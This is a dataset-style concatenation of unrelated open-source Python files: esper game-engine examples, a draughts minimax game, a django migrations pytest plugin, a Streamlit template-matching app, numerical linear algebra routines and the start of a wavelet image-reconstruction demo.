'\xe7\x68\xb3\x6d': 'obj:xpath-expr-filt',
'\x67\x44\xc2\x7e': 'obj:xpath-expr-func',
'\x17\xe0\x31\x27': 'obj:xpath-expr-numlit',
'\x35\x60\xa2\x3b': 'obj:xpath-expr-numneg',
'\xfc\x87\x51\x53': 'obj:xpath-expr-path',
'\xef\x45\x98\x8f': 'obj:xpath-expr-strlit',
'\xff\x82\x5b\x62': 'obj:xpath-expr-union',
'\xf9\x4b\xf7\xa8': 'obj:xpath-expr-varref',
'\x5c\x57\xbb\x5e': 'obj:xpathref',
'\x5e\x88\x11\xfe': 'obj:xpathcond',
'\xf4\xaa\xb2\xe9': 'obj:resfiledatasrc',
'\xf6\xc7\x83\x5c': 'obj:localedatasrc',
'\x27\x53\xac\x23': 'obj:simplehttptxmsg',
'\x01\x12\x89\x43': 'obj:smstxmsg',
'\x21\x71\xd6\x5d': 'obj:binsmstxmsg',
# '\xed\x09\xe3\x8e': 'obj:forminst', #unused i think
# '\xfb\x2c\xa2\x76': 'obj:txmsgserwrapper' #unused i think
}
if tag in type_tags:
basetype = type_tags[tag]
if basetype == 'generic':
raise ValueError("'generic' type tag should never show up in practice")
return basetype
else:
raise ValueError("no type known for tag %s" % tohex(tag)) #TODO: propogate partial deserialization
def hexinput (hexstr):
return ''.join([chr(int(c, 16)) for c in hexstr.split()])
def tohex (bytes):
return ' '.join(['%02x' % ord(b) for b in bytes])
``` |
{
"source": "jonathanabennett/esper",
"score": 3
} |
#### File: esper/examples/pygame_example.py
```python
import pygame
import esper
FPS = 60
RESOLUTION = 720, 480
##################################
# Define some Components:
##################################
class Velocity:
def __init__(self, x=0.0, y=0.0):
self.x = x
self.y = y
class Renderable:
def __init__(self, image, posx, posy, depth=0):
self.image = image
self.depth = depth
self.x = posx
self.y = posy
self.w = image.get_width()
self.h = image.get_height()
################################
# Define some Processors:
################################
class MovementProcessor(esper.Processor):
def __init__(self, minx, maxx, miny, maxy):
super().__init__()
self.minx = minx
self.maxx = maxx
self.miny = miny
self.maxy = maxy
def process(self):
# This will iterate over every Entity that has BOTH of these components:
for ent, (vel, rend) in self.world.get_components(Velocity, Renderable):
            # Update the Renderable Component's position by its Velocity:
rend.x += vel.x
rend.y += vel.y
# An example of keeping the sprite inside screen boundaries. Basically,
# adjust the position back inside screen boundaries if it tries to go outside:
rend.x = max(self.minx, rend.x)
rend.y = max(self.miny, rend.y)
rend.x = min(self.maxx - rend.w, rend.x)
rend.y = min(self.maxy - rend.h, rend.y)
class RenderProcessor(esper.Processor):
def __init__(self, window, clear_color=(0, 0, 0)):
super().__init__()
self.window = window
self.clear_color = clear_color
def process(self):
# Clear the window:
self.window.fill(self.clear_color)
# This will iterate over every Entity that has this Component, and blit it:
for ent, rend in self.world.get_component(Renderable):
self.window.blit(rend.image, (rend.x, rend.y))
# Flip the framebuffers
pygame.display.flip()
################################
# The main core of the program:
################################
def run():
# Initialize Pygame stuff
pygame.init()
window = pygame.display.set_mode(RESOLUTION)
pygame.display.set_caption("Esper Pygame example")
clock = pygame.time.Clock()
pygame.key.set_repeat(1, 1)
# Initialize Esper world, and create a "player" Entity with a few Components.
world = esper.World()
player = world.create_entity()
world.add_component(player, Velocity(x=0, y=0))
world.add_component(player, Renderable(image=pygame.image.load("redsquare.png"), posx=100, posy=100))
# Another motionless Entity:
enemy = world.create_entity()
world.add_component(enemy, Renderable(image=pygame.image.load("bluesquare.png"), posx=400, posy=250))
    # Create some Processor instances, and assign them to be processed.
render_processor = RenderProcessor(window=window)
movement_processor = MovementProcessor(minx=0, maxx=RESOLUTION[0], miny=0, maxy=RESOLUTION[1])
world.add_processor(render_processor)
world.add_processor(movement_processor)
running = True
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_LEFT:
# Here is a way to directly access a specific Entity's
# Velocity Component's attribute (y) without making a
# temporary variable.
world.component_for_entity(player, Velocity).x = -3
elif event.key == pygame.K_RIGHT:
# For clarity, here is an alternate way in which a
# temporary variable is created and modified. The previous
# way above is recommended instead.
player_velocity_component = world.component_for_entity(player, Velocity)
player_velocity_component.x = 3
elif event.key == pygame.K_UP:
world.component_for_entity(player, Velocity).y = -3
elif event.key == pygame.K_DOWN:
world.component_for_entity(player, Velocity).y = 3
elif event.key == pygame.K_ESCAPE:
running = False
elif event.type == pygame.KEYUP:
if event.key in (pygame.K_LEFT, pygame.K_RIGHT):
world.component_for_entity(player, Velocity).x = 0
if event.key in (pygame.K_UP, pygame.K_DOWN):
world.component_for_entity(player, Velocity).y = 0
# A single call to world.process() will update all Processors:
world.process()
clock.tick(FPS)
if __name__ == "__main__":
run()
pygame.quit()
```
#### File: esper/examples/pyglet_example.py
```python
import pyglet
import esper
FPS = 60
RESOLUTION = 720, 480
##################################
# Define some Components:
##################################
class Velocity:
def __init__(self, x=0.0, y=0.0):
self.x = x
self.y = y
class Renderable:
def __init__(self, sprite):
self.sprite = sprite
self.w = sprite.width
self.h = sprite.height
################################
# Define some Processors:
################################
class MovementProcessor(esper.Processor):
def __init__(self, minx, maxx, miny, maxy):
super().__init__()
self.minx = minx
self.miny = miny
self.maxx = maxx
self.maxy = maxy
def process(self, dt):
# This will iterate over every Entity that has BOTH of these components:
for ent, (vel, rend) in self.world.get_components(Velocity, Renderable):
            # Update the Renderable Component's position by its Velocity:
# An example of keeping the sprite inside screen boundaries. Basically,
# adjust the position back inside screen boundaries if it is outside:
new_x = max(self.minx, rend.sprite.x + vel.x)
new_y = max(self.miny, rend.sprite.y + vel.y)
new_x = min(self.maxx - rend.w, new_x)
new_y = min(self.maxy - rend.h, new_y)
rend.sprite.position = new_x, new_y
###############################################
# Initialize pyglet window and graphics batch:
###############################################
window = pyglet.window.Window(width=RESOLUTION[0],
height=RESOLUTION[1],
caption="Esper pyglet example")
batch = pyglet.graphics.Batch()
# Initialize Esper world, and create a "player" Entity with a few Components:
world = esper.World()
player = world.create_entity()
world.add_component(player, Velocity(x=0, y=0))
player_image = pyglet.resource.image("redsquare.png")
world.add_component(player, Renderable(sprite=pyglet.sprite.Sprite(img=player_image,
x=100,
y=100,
batch=batch)))
# Another motionless Entity:
enemy = world.create_entity()
enemy_image = pyglet.resource.image("bluesquare.png")
world.add_component(enemy, Renderable(sprite=pyglet.sprite.Sprite(img=enemy_image,
x=400,
y=250,
batch=batch)))
# Create some Processor instances, and assign them to the World to be processed:
movement_processor = MovementProcessor(minx=0, miny=0, maxx=RESOLUTION[0], maxy=RESOLUTION[1])
world.add_processor(movement_processor)
################################################
# Set up pyglet events for input and rendering:
################################################
@window.event
def on_key_press(key, mod):
if key == pyglet.window.key.RIGHT:
world.component_for_entity(player, Velocity).x = 3
if key == pyglet.window.key.LEFT:
world.component_for_entity(player, Velocity).x = -3
if key == pyglet.window.key.UP:
world.component_for_entity(player, Velocity).y = 3
if key == pyglet.window.key.DOWN:
world.component_for_entity(player, Velocity).y = -3
@window.event
def on_key_release(key, mod):
if key in (pyglet.window.key.RIGHT, pyglet.window.key.LEFT):
world.component_for_entity(player, Velocity).x = 0
if key in (pyglet.window.key.UP, pyglet.window.key.DOWN):
world.component_for_entity(player, Velocity).y = 0
@window.event
def on_draw():
# Clear the window:
window.clear()
# Draw the batch of Renderables:
batch.draw()
####################################################
# Schedule a World update and start the pyglet app:
####################################################
if __name__ == "__main__":
# NOTE! schedule_interval will automatically pass a "delta time" argument
# to world.process, so you must make sure that your Processor classes
# account for this. See the example Processors above.
pyglet.clock.schedule_interval(world.process, interval=1.0/FPS)
pyglet.app.run()
```
#### File: esper/examples/pysdl2_example.py
```python
from sdl2 import *
import sdl2.ext as ext
import esper
RESOLUTION = 720, 480
##################################
# Define some Components:
##################################
class Velocity:
def __init__(self, x=0.0, y=0.0):
self.x = x
self.y = y
class Renderable:
def __init__(self, texture, width, height, posx, posy):
self.texture = texture
self.x = posx
self.y = posy
self.w = width
self.h = height
################################
# Define some Processors:
################################
class MovementProcessor(esper.Processor):
def __init__(self, minx, maxx, miny, maxy):
super().__init__()
self.minx = minx
self.maxx = maxx
self.miny = miny
self.maxy = maxy
def process(self):
# This will iterate over every Entity that has BOTH of these components:
for ent, (vel, rend) in self.world.get_components(Velocity, Renderable):
            # Update the Renderable Component's position by its Velocity:
rend.x += vel.x
rend.y += vel.y
# An example of keeping the sprite inside screen boundaries. Basically,
# adjust the position back inside screen boundaries if it tries to go outside:
rend.x = max(self.minx, rend.x)
rend.y = max(self.miny, rend.y)
rend.x = min(self.maxx - rend.w, rend.x)
rend.y = min(self.maxy - rend.h, rend.y)
class RenderProcessor(esper.Processor):
def __init__(self, renderer, clear_color=(0, 0, 0)):
super().__init__()
self.renderer = renderer
self.clear_color = clear_color
def process(self):
# Clear the window:
self.renderer.clear(self.clear_color)
# Create a destination Rect for the texture:
destination = SDL_Rect(0, 0, 0, 0)
# This will iterate over every Entity that has this Component, and blit it:
for ent, rend in self.world.get_component(Renderable):
destination.x = int(rend.x)
destination.y = int(rend.y)
destination.w = rend.w
destination.h = rend.h
SDL_RenderCopy(self.renderer.renderer, rend.texture, None, destination)
self.renderer.present()
################################
# Some SDL2 Functions:
################################
def texture_from_image(renderer, image_name):
"""Create an SDL2 Texture from an image file"""
soft_surface = ext.load_image(image_name)
texture = SDL_CreateTextureFromSurface(renderer.renderer, soft_surface)
SDL_FreeSurface(soft_surface)
return texture
################################
# The main core of the program:
################################
def run():
# Initialize PySDL2 stuff
ext.init()
window = ext.Window(title="Esper PySDL2 example", size=RESOLUTION)
renderer = ext.Renderer(target=window)
window.show()
# Initialize Esper world, and create a "player" Entity with a few Components.
world = esper.World()
player = world.create_entity()
world.add_component(player, Velocity(x=0, y=0))
world.add_component(player, Renderable(texture=texture_from_image(renderer, "redsquare.png"),
width=64, height=64, posx=100, posy=100))
# Another motionless Entity:
enemy = world.create_entity()
world.add_component(enemy, Renderable(texture=texture_from_image(renderer, "bluesquare.png"),
width=64, height=64, posx=400, posy=250))
    # Create some Processor instances, and assign them to be processed.
render_processor = RenderProcessor(renderer=renderer)
movement_processor = MovementProcessor(minx=0, maxx=RESOLUTION[0], miny=0, maxy=RESOLUTION[1])
world.add_processor(render_processor)
world.add_processor(movement_processor)
# A simple main loop
running = True
while running:
start_time = SDL_GetTicks()
for event in ext.get_events():
if event.type == SDL_QUIT:
running = False
break
if event.type == SDL_KEYDOWN:
if event.key.keysym.sym == SDLK_UP:
# Here is a way to directly access a specific Entity's Velocity
# Component's attribute (y) without making a temporary variable.
world.component_for_entity(player, Velocity).y = -3
elif event.key.keysym.sym == SDLK_DOWN:
# For clarity, here is an alternate way in which a temporary variable
# is created and modified. The previous way above is recommended instead.
player_velocity_component = world.component_for_entity(player, Velocity)
player_velocity_component.y = 3
elif event.key.keysym.sym == SDLK_LEFT:
world.component_for_entity(player, Velocity).x = -3
elif event.key.keysym.sym == SDLK_RIGHT:
world.component_for_entity(player, Velocity).x = 3
elif event.key.keysym.sym == SDLK_ESCAPE:
running = False
break
elif event.type == SDL_KEYUP:
if event.key.keysym.sym in (SDLK_UP, SDLK_DOWN):
world.component_for_entity(player, Velocity).y = 0
if event.key.keysym.sym in (SDLK_LEFT, SDLK_RIGHT):
world.component_for_entity(player, Velocity).x = 0
# A single call to world.process() will update all Processors:
world.process()
# A crude FPS limiter for about 60fps
current_time = SDL_GetTicks()
sleep_time = int(start_time + 16.667 - current_time)
if sleep_time > 0:
SDL_Delay(sleep_time)
if __name__ == "__main__":
run()
ext.quit()
``` |
{
"source": "jonathanabila/22E1_5-draughts",
"score": 4
} |
#### File: src/agents/minimax.py
```python
import random
from collections import deque
previous_board = deque(maxlen=5)
def minimax(game, depth, max_player, player):
"""
param board: Current state of the board.
param depth: Maximum depth to explore, less make the game faster, but also less smart.
param max_player: The player to maxime to move.
"""
best_board = game.board
player_function = max if max_player else min
best_score = float("-inf") if max_player else float("inf")
if depth == 0 or game.get_winner():
return game.board.evaluate(), game
for board in game.board.get_valid_boards(player):
        should_max_player = not max_player
evaluation, _ = minimax(game, depth - 1, should_max_player, player)
player_eval = player_function(best_score, evaluation)
# The AI is going to play the start of the game in the same way always if we don't add some
# randomization to the evaluation.
if player_eval == evaluation and (
random.randint(0, 9) > 7
or player_eval < best_score
and max_player
or player_eval > best_score
and not max_player
):
            # Sometimes the AI keeps repeating the same moves to avoid losing pieces; we need to stop that.
previous_board.append(board)
if previous_board.count(board) > 2:
continue
best_board = board
best_score = evaluation
return best_score, best_board
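
# Minimal usage sketch (illustrative only; it assumes a GameManager-like object from
# src/managers.py exposing .board, .white_player and .select_ai_move(), and a search
# depth chosen by the caller):
#
#   _, best_board = minimax(game, depth=3, max_player=True, player=game.white_player)
#   game.select_ai_move(best_board)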
```
#### File: 22E1_5-draughts/src/managers.py
```python
from constants import BLUE, RED, SQUARE_SIZE, WHITE
from models.board import Board
import pygame
class GameManager:
def __init__(self, window):
self.window = window
self.selected_piece = None
self.board = Board()
self.turn = RED
self.valid_moves = {}
def change_turn(self):
self.valid_moves = {}
if self.turn == RED:
self.turn = WHITE
else:
self.turn = RED
@property
def white_player(self):
return WHITE
@property
def red_player(self):
return RED
def is_ai_turn(self):
return self.turn == WHITE
def _move(self, row, column):
piece = self.board.get_piece(row, column)
if (
self.selected_piece is not None
and piece is None
and (row, column) in self.valid_moves
):
self.board.move(self.selected_piece, row, column)
skipped = self.valid_moves[(row, column)]
if skipped:
self.board.remove(skipped)
self.change_turn()
return True
return False
def select(self, row, column):
if self.selected_piece is not None:
is_moved = self._move(row, column)
if is_moved is True:
self.selected_piece = None
self.select(row, column)
piece = self.board.get_piece(row, column)
if piece is not None and piece.color == self.turn:
self.selected_piece = piece
self.valid_moves = self.board.get_valid_moves(self.selected_piece)
return True
return False
def select_ai_move(self, board):
self.board = board
self.change_turn()
def draw_valid_moves(self, moves):
for move in moves:
row, col = move
pygame.draw.circle(
self.window,
BLUE,
(
col * SQUARE_SIZE + SQUARE_SIZE // 2,
row * SQUARE_SIZE + SQUARE_SIZE // 2,
),
15,
)
def get_winner(self):
return self.board.winner()
def update(self):
self.board.draw(self.window)
self.draw_valid_moves(self.valid_moves)
pygame.display.update()
```
#### File: src/models/board.py
```python
from copy import deepcopy
from typing import List
from constants import BLACK, COLS, PIECES, RED, ROWS, SQUARE_SIZE, WHITE
from models.pieces import Piece
import pygame
class Board:
def __init__(self):
self.board = []
self.create_board()
self.white_left = self.red_left = PIECES
self.white_kings = self.red_kings = 0
def winner(self):
if self.red_left <= 0:
return WHITE
elif self.white_left <= 0:
return RED
return None
def get_piece(self, row, column):
return self.board[row][column]
def move(self, piece: Piece, row, column):
self.board[piece.row][piece.column], self.board[row][column] = (
self.board[row][column],
self.board[piece.row][piece.column],
)
piece.move(row, column)
if row == ROWS - 1 or row == 0:
piece.make_king()
if piece.color == WHITE:
self.white_kings += 1
if piece.color == RED:
self.red_kings += 1
def remove(self, pieces: List[Piece]):
for piece in pieces:
row, column = piece.row, piece.column
self.board[row][column] = None
if piece is not None:
if piece.color == RED:
self.red_left -= 1
else:
self.white_left -= 1
def _traverse_left(self, start, stop, step, color, left, skipped=None):
moves = {}
last = []
for r in range(start, stop, step):
if left < 0:
break
current = self.board[r][left]
if current is None:
if skipped and not last:
break
elif skipped:
moves[(r, left)] = last + skipped
else:
moves[(r, left)] = last
if last:
if step == -1:
row = max(r - 3, 0)
else:
row = min(r + 3, ROWS)
moves.update(
self._traverse_left(
r + step, row, step, color, left - 1, skipped=last
)
)
moves.update(
self._traverse_right(
r + step, row, step, color, left + 1, skipped=last
)
)
break
elif current.color == color:
break
else:
last = [current]
left -= 1
return moves
def _traverse_right(self, start, stop, step, color, right, skipped=None):
moves = {}
last = []
for r in range(start, stop, step):
if right >= COLS:
break
current = self.board[r][right]
if current is None:
if skipped and not last:
break
elif skipped:
moves[(r, right)] = last + skipped
else:
moves[(r, right)] = last
if last:
if step == -1:
row = max(r - 3, 0)
else:
row = min(r + 3, ROWS)
moves.update(
self._traverse_left(
r + step, row, step, color, right - 1, skipped=last
)
)
moves.update(
self._traverse_right(
r + step, row, step, color, right + 1, skipped=last
)
)
break
elif current.color == color:
break
else:
last = [current]
right += 1
return moves
def get_valid_moves(self, piece: Piece):
valid_moves = {}
left, right, row = piece.column - 1, piece.column + 1, piece.row
if piece.color == RED or piece.king:
valid_left_move = self._traverse_left(
row - 1, max(row - 3, -1), -1, piece.color, left
)
valid_right_move = self._traverse_right(
row - 1, max(row - 3, -1), -1, piece.color, right
)
valid_moves.update(valid_left_move)
valid_moves.update(valid_right_move)
if piece.color == WHITE or piece.king:
valid_left_move = self._traverse_left(
row + 1, min(row + 3, ROWS), 1, piece.color, left
)
valid_right_move = self._traverse_right(
row + 1, min(row + 3, ROWS), 1, piece.color, right
)
valid_moves.update(valid_left_move)
valid_moves.update(valid_right_move)
return valid_moves
def get_valid_boards(self, player):
boards = []
for piece in self.get_pieces(player):
for (move_row, move_column), skip in self.get_valid_moves(piece).items():
temporary_board = deepcopy(self)
temporary_piece = temporary_board.get_piece(piece.row, piece.column)
temporary_board.move(temporary_piece, move_row, move_column)
if skip:
temporary_board.remove(skip)
boards.append(temporary_board)
return boards
@staticmethod
def draw_squares(window):
window.fill(BLACK)
for row in range(ROWS):
for col in range(row % 2, COLS, 2):
pygame.draw.rect(
window,
RED,
(row * SQUARE_SIZE, col * SQUARE_SIZE, SQUARE_SIZE, SQUARE_SIZE),
)
def draw(self, window):
self.draw_squares(window)
for row in range(ROWS):
for column in range(COLS):
piece = self.board[row][column]
if piece is not None:
piece.draw(window)
def create_board(self):
for row in range(ROWS):
self.board.append([])
for column in range(COLS):
if column % 2 == (row + 1) % 2:
if row < 3:
piece = Piece(row, column, WHITE)
self.board[row].append(piece)
elif row > 4:
piece = Piece(row, column, RED)
self.board[row].append(piece)
else:
self.board[row].append(None)
else:
self.board[row].append(None)
def get_pieces(self, player):
pieces = []
for row in self.board:
for piece in row:
if piece and piece.color == player:
pieces.append(piece)
return pieces
def evaluate(self):
return (
self.white_left
- self.red_left
+ (self.white_kings * 0.5 - self.red_kings * 0.5)
)
```
#### File: src/models/pieces.py
```python
from constants import CROWN, GREY, SQUARE_SIZE
import pygame.draw
PADDING = 15
OUTLINE = 2
class Piece:
def __init__(self, row, column, color):
self.row = row
self.column = column
self.color = color
self._king = False
self.x = 0
self.y = 0
self._calculate_position()
def __repr__(self):
return f"Piece({self.row}, {self.column}, {self.color})"
@property
def king(self):
return self._king
def _calculate_position(self):
self.x = SQUARE_SIZE * self.column + SQUARE_SIZE // 2
self.y = SQUARE_SIZE * self.row + SQUARE_SIZE // 2
def make_king(self):
self._king = True
def move(self, row, column):
self.row = row
self.column = column
self._calculate_position()
def draw(self, window):
radius = SQUARE_SIZE // 2 - PADDING
pygame.draw.circle(window, GREY, (self.x, self.y), radius + OUTLINE)
pygame.draw.circle(window, self.color, (self.x, self.y), radius)
if self.king is True:
window.blit(
CROWN,
(self.x - CROWN.get_width() // 2, self.y - CROWN.get_height() // 2),
)
``` |
{
"source": "jonathanabila/django-test-migrations",
"score": 3
} |
#### File: django_test_migrations/contrib/pytest_plugin.py
```python
from typing import Optional
import pytest
from django.db import DEFAULT_DB_ALIAS
@pytest.fixture()
def migrator_factory(request, transactional_db, django_db_use_migrations):
"""
Pytest fixture to create migrators inside the pytest tests.
How? Here's an example.
.. code:: python
@pytest.mark.django_db
def test_migration(migrator_factory):
migrator = migrator_factory('custom_db_alias')
old_state = migrator.apply_initial_migration(('main_app', None))
new_state = migrator.apply_tested_migration(
('main_app', '0001_initial'),
)
assert isinstance(old_state, ProjectState)
assert isinstance(new_state, ProjectState)
Why do we import :class:`Migrator` inside the fixture function?
Otherwise, coverage won't work correctly during our internal tests.
Why? Because modules in Python are singletons.
Once imported, they will be stored in memory and reused.
That's why we cannot import ``Migrator`` on a module level.
    Because it won't be caught by coverage later on.
"""
from django_test_migrations.migrator import Migrator # noqa: WPS433
if not django_db_use_migrations:
pytest.skip('--nomigrations was specified')
def factory(database_name: Optional[str] = None) -> Migrator:
migrator = Migrator(database_name)
request.addfinalizer(migrator.reset) # noqa: PT021
return migrator
return factory
@pytest.fixture()
def migrator(migrator_factory): # noqa: WPS442
"""
Useful alias for ``'default'`` database in ``django``.
That's a predefined instance of a ``migrator_factory``.
How to use it? Here's an example.
.. code:: python
@pytest.mark.django_db
def test_migration(migrator):
old_state = migrator.apply_initial_migration(('main_app', None))
new_state = migrator.apply_tested_migration(
('main_app', '0001_initial'),
)
assert isinstance(old_state, ProjectState)
assert isinstance(new_state, ProjectState)
Just one step easier than ``migrator_factory`` fixture.
"""
return migrator_factory(DEFAULT_DB_ALIAS)
``` |
{
"source": "jonathanadamrico/FindMe",
"score": 3
} |
#### File: jonathanadamrico/FindMe/main.py
```python
import streamlit as st
import numpy as np
import matplotlib.pyplot as plt
from PIL import Image
import cv2
def rotate_image(image, angle):
image_center = tuple(np.array(image.shape[1::-1]) / 2)
rot_mat = cv2.getRotationMatrix2D(image_center, angle, 1.0)
result = cv2.warpAffine(image, rot_mat, image.shape[1::-1], flags=cv2.INTER_LINEAR)
return result
def main():
st.set_page_config(page_title='FindMe')
st.title("FindMe")
st.write('''
**Hidden Object Finder**
Finds hidden objects in a big crowded picture based on a template object.
Note that the application uses opencv-python's matchTemplate module and currently works best on grayscale images and unrotated objects.
''')
sample_image = Image.open('input/ShakeBreak.png')
st.image(sample_image, caption='Sample Image', use_column_width=True)
st.write("***")
st.write("### Step 1")
image_src = st.file_uploader("Upload the big picture where we need to find the hidden objects", type=['png','jpg','jpeg'])
if image_src is not None:
img_rgb = Image.open(image_src)
st.image(img_rgb, caption='Big Picture', use_column_width=True)
st.write("***")
st.write("### Step 2")
template_src = st.file_uploader("Upload an image that looks similar to the hidden objects", type=['png','jpg','jpeg'])
if template_src is not None:
template = Image.open(template_src)
img_gray = cv2.cvtColor(np.array(img_rgb), cv2.COLOR_BGR2GRAY)
template = cv2.cvtColor(np.array(template), cv2.COLOR_BGR2GRAY)
st.image(template, caption='Hidden Object', use_column_width=False)
height, width = template.shape[::]
st.write("***")
st.write("### Step 3")
threshold = st.slider('Select a value for the threshold', 0.0, 1.0, 0.5)
st.write(f"Finding objects at **{threshold}** similarity threshold...")
result = cv2.matchTemplate(img_gray, template, cv2.TM_CCOEFF_NORMED)
loc = np.where(result >= threshold)
find_count = len(loc[0])
# We want a colored rectangle on top of the gray image
img_gray = cv2.cvtColor(img_gray, cv2.COLOR_GRAY2BGR)
for pt in zip(*loc[::-1]):
top_left = pt
bottom_right = (pt[0] + width, pt[1] + height)
cv2.rectangle(img_gray, top_left, bottom_right, (0, 255, 0), 1)
st.write("***")
st.write("### Result")
if find_count == 0:
st.warning("No objects were found. Try decreasing the threshold to find objects.")
if threshold == 0:
st.warning("Unfortunately, the algorithm is not good enough to find the hidden object(s).")
elif find_count > 100:
st.warning("You may try increasing the threshold to avoid too many false positives.")
else:
st.success("Object(s) found!")
st.image(img_gray, use_column_width=True)
st.write("***")
st.write('''The results may not be very accurate when the hidden objects are of different sizes, colors, backgrounds,
and rotations compared to the template image.
You may visit the [github page](https://github.com/jonathanadamrico/FindMe) for the source codes, documentations, and references.
''')
st.write("### Thank you!")
if __name__ == "__main__":
main()
# Reference:
#https://towardsdatascience.com/object-detection-on-python-using-template-matching-ab4243a0ca62
``` |
{
"source": "Jonathan-Adly/htmx-tictactoe",
"score": 3
} |
#### File: htmx-tictactoe/accounts/models.py
```python
from django.contrib.postgres.fields import ArrayField
from django.contrib.auth.models import AbstractUser
from django.db import models
"""
Our Board should look like this initially = [[0,0,0],[0,0,0],[0,0,0]]
Then as players play, it should look like this = [[1,0,2], [1,2,0], [0,0,0]]
empty = 0
X = 1
O = 2
"""
class CustomUser(AbstractUser):
def get_default():
return [[0, 0, 0], [0, 0, 0], [0, 0, 0]]
player = models.CharField(max_length=1, default="X")
board = ArrayField(ArrayField(models.IntegerField()), default=get_default)
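
# Illustrative example of the encoding above: after X plays the centre cell and
# O plays the top-right cell, `board` would hold [[0, 0, 2], [0, 1, 0], [0, 0, 0]].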
``` |
{
"source": "JonathanAlcantara/NumericalLinearAlgebra_Applications",
"score": 3
} |
#### File: NumericalLinearAlgebra_Applications/Cholesky/cholesky.py
```python
import numpy as np
from math import pow
from math import sqrt
def cholesky(A):
    # if not np.all(np.linalg.eigvals(A) > 0):
    #     print("Matrix is not positive definite")
    #     return False
L = [[0.0] * len(A) for i in range(len(A))]
for row in range(len(A)):
sum_row = 0
for k in range(row):
sum_row += pow(L[row][k], 2)
L[row][row] = sqrt(A[row][row] - sum_row)
print('%s, %s: %s' % (row+1, row+1, L[row][row]))
for column in range(row + 1, len(A)):
sum_column = 0
for k in range(row):
sum_column += L[row][k]*L[column][k]
L[column][row] = (A[row][column] - sum_column)/L[row][row]
print('%s, %s: %s' % (row+1, column+1, L[column][row]))
A = np.array(A)
L = np.array(L)
transposed_L = np.transpose(L)
    print('\nA : \n', A)
    print('\nL : \n', L)
    print('\nL_T :\n', transposed_L)
return A, L, transposed_L
def cholesky_solution(L, B):
    print('Cholesky Solution: ', np.matmul(np.linalg.inv(np.matmul(L, np.transpose(L))), np.transpose(B)))
def cholesky_det(L):
    print('Cholesky Determinant: ', np.power(np.prod(L.diagonal()), 2))
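
# Minimal usage sketch (commented out; the matrix below is an assumed example of a
# symmetric positive definite matrix):
#
#   A_spd = [[4.0, 12.0, -16.0], [12.0, 37.0, -43.0], [-16.0, -43.0, 98.0]]
#   _, L, _ = cholesky(A_spd)
#   cholesky_det(L)
#   cholesky_solution(L, [1.0, 2.0, 3.0])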
```
#### File: NumericalLinearAlgebra_Applications/PowerMethod/power_method.py
```python
import numpy as np
tolerance = 0.00001
A = [[1, 0.2, 0], [0.2, 1, 0.5], [0, 0.5, 1]]
def power_method(A):
X = [1]*len(A[0])
new_X = list(X)
eigenvalue_candidate = 1
solution_residue = eigenvalue_candidate
while solution_residue > tolerance:
        print('\nLargest Eigenvalue Candidate: ', eigenvalue_candidate)
        print('Associated Eigenvector: ', X)
X = np.matmul(A, X)
solution_residue = abs(X[0] - eigenvalue_candidate)/abs(X[0])
eigenvalue_candidate = X[0]
for X_element in range(len(X)):
X[X_element] = X[X_element]/float(eigenvalue_candidate)
    print('\nLargest Eigenvalue: ', eigenvalue_candidate)
    print('Associated Eigenvector: ', X)
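
# Example run (commented out) on the 3x3 symmetric matrix A defined above:
#
#   power_method(A)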
```
#### File: NumericalLinearAlgebra_Applications/RootFinding/bisection.py
```python
tolerance = 0.00000001
def bisection(a, b, f):
while abs(b - a) > tolerance:
x_current = (a+b)/2.0
func_current_value = f(x_current)
if(func_current_value > 0.0):
b = x_current
else:
a = x_current
return x_current
def f(x):
    return x - 1
print(bisection(-10, 10, f))
```
#### File: NumericalLinearAlgebra_Applications/RootFinding/multi_newton.py
```python
import numpy as np
tolerance = 0.00000001
iterations_limit = 10000
def multi_newton(x0_vector, f_vector, jacobian_vector):
x_vector = x0_vector
for iteration in range(iterations_limit):
jacobian_current_values = jacobian_vector(x_vector)
function_current_values = f_vector(x_vector)
delta_x = -1*(np.linalg.inv(jacobian_current_values)
@ function_current_values)
x_vector = x_vector + delta_x
if(np.linalg.norm(delta_x)/np.linalg.norm(x_vector) \
< tolerance):
return x_vector
return "Convergence not reached"
def f_vector(x_vector):
return np.array([[x_vector[0][0] + 2*x_vector[1][0] - 2.0],
[pow(x_vector[0][0], 2) + 4*pow(x_vector[1][0], 2) - 4]])
def jacobian_vector(x_vector):
return np.array([[1, 2], [2*x_vector[0][0], 8*x_vector[1][0]]])
print(multi_newton(np.array([[2], [3]]), f_vector, jacobian_vector))
```
#### File: NumericalLinearAlgebra_Applications/RootFinding/newton.py
```python
import numpy as np
tolerance = 0.00000001
iterations_limit = 10000
def newton(x0, f, f_derivative):
x_previous = x0
for iteration in range(iterations_limit):
x_current = x_previous - f(x_previous)/f_derivative(x_previous)
if(abs(x_current - x_previous) < tolerance):
return x_current
x_previous = x_current
return x_current
def f(x):
    return pow(x, 2) - 4*np.cos(x)
def f_derivative(x):
return 2*x + 4*np.sin(x)
print(newton(10.0, f, f_derivative))
```
#### File: NumericalLinearAlgebra_Applications/RootFinding/secant.py
```python
import numpy as np
tolerance = 0.00000001
iterations_limit = 10000
pace = 0.001
def secant(x0, f):
x_previous = x0
x_current = x_previous + pace
func_previous_value = f(x0)
for iteration in range(iterations_limit):
func_current_value = f(x_current)
x_next = x_current - func_current_value*\
((x_current - x_previous)/\
(func_current_value - func_previous_value))
if(abs(x_next - x_current) < tolerance):
return x_current
x_previous = x_current
x_current = x_next
func_previous_value = func_current_value
return x_current
def f(x):
    return pow(x, 2) - 4*np.cos(x)
print(secant(10.0, f))
``` |
{
"source": "JonathanAlis/IAFNNESTA",
"score": 3
} |
#### File: JonathanAlis/IAFNNESTA/demo_wavelet.py
```python
import numpy as np
from scipy import sparse
import sys
import random as rd
import matplotlib.pyplot as plt
from PIL import Image
import waveletDec as wd
import IAFNNESTA
import IAFNNesterov
def help():
return '''
    Here we compare the TV reconstruction with the L1 reconstruction in the wavelet domain.
    IAFNNesterov also allows using transformations instead of filters, and we show that
    this presents the same results as the L1 wavelet reconstruction.
'''
print(help())
def rgb2gray(rgb):
return np.dot(rgb[...,:3], [0.2989, 0.5870, 0.1140])
def GetNotNansPos(x):
x=x.reshape((-1,1))
get_not_nan = lambda xs: [i for (y, i) in zip(xs, range(len(xs))) if y==y]
return get_not_nan(x)
def AdjointSampling(x,pos,origShape):
y = np.empty(origShape)
y[:]=np.nan
y=y.reshape((-1,1))
y[pos]=x
y=y.reshape(origShape)
from scipy import interpolate
array = np.ma.masked_invalid(y)
xx, yy = np.meshgrid(np.arange(0, origShape[0]),np.arange(0, origShape[1]))
